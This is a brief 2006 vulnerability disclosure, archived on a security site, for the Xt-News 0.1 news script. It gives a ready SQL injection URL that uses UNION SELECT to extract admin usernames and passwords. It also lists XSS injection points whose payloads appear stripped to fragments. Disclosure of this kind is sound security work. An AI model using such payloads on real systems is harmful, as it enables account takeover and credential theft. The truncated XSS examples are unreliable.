TUCoPS :: HP Unsorted X :: c07-1457.htm

Xt-News 0.1 : SQL Injection Vulnerability & XSS
Xt-News 0.1 : SQL Injection Vulnerability & XSS
Xt-News 0.1 : SQL Injection Vulnerability & XSS


Xt-News 0.1
-----------
Vendor site: http://dreaxteam.free.fr/forums/ 
Product: Xt-News 0.1
Vulnerability: SQL Injection Vulnerability & XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 10/12/06
Public disclosure: 22/12/06
 
Description:
------------
SQL Injection Vulnerability:
http://[victim]/[script_news_path]/show_news.php?id_news=[SQL INJECTION] 
http://[victim]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE admin=1# 


XSS:
http://[victim]/[script_news_path]/add_comment.php?id_news=[XSS] 
http://[victim]/[script_news_path]/add_comment.php?id_news="> " 
http://[victim]/[script_news_path]/show_news.php?id_news=[XSS] 
http://[victim]/[script_news_path]/show_news.php?id_news='> ' 


-------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH